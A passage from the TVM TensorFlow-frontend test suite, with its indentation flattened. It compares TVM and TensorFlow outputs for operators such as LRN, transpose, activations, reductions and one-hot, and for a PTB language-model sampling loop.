graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
        # Cell inputs 'c' and 'h' consist of all layers' values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).numpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).numpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
        # Create 10 predicted statements of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
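# For reference, TF's LRN normalizes over the last (channel) dimension:
#   sqr_sum[a, b, c, d] = sum(input[a, b, c, d - depth_radius : d + depth_radius + 1] ** 2)
#   output = input / (bias + alpha * sqr_sum) ** beta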
def _test_lrn(ishape, size, axis, bias, alpha, beta):
"""testing local response normalization"""
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
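# For reference: l2_normalize computes output = x / sqrt(max(sum(x ** 2, axis), epsilon))
# along the given axis.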
def _test_l2_normalize(ishape, eps, axis):
"""testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_transpose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
    _test_forward_transpose_axes_input((2, 3, 4), (1, 2, 0))
    _test_forward_transpose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax"""
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square"""
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp"""
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan"""
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1"""
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign"""
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint"""
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg"""
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
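        # reduce_prod is only exercised on data flattened to (1, N) and reduced along axis 1.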
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
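            # With range_axis set, the reduction axes are supplied as a dynamic tf.range tensor instead of a Python tuple.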
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
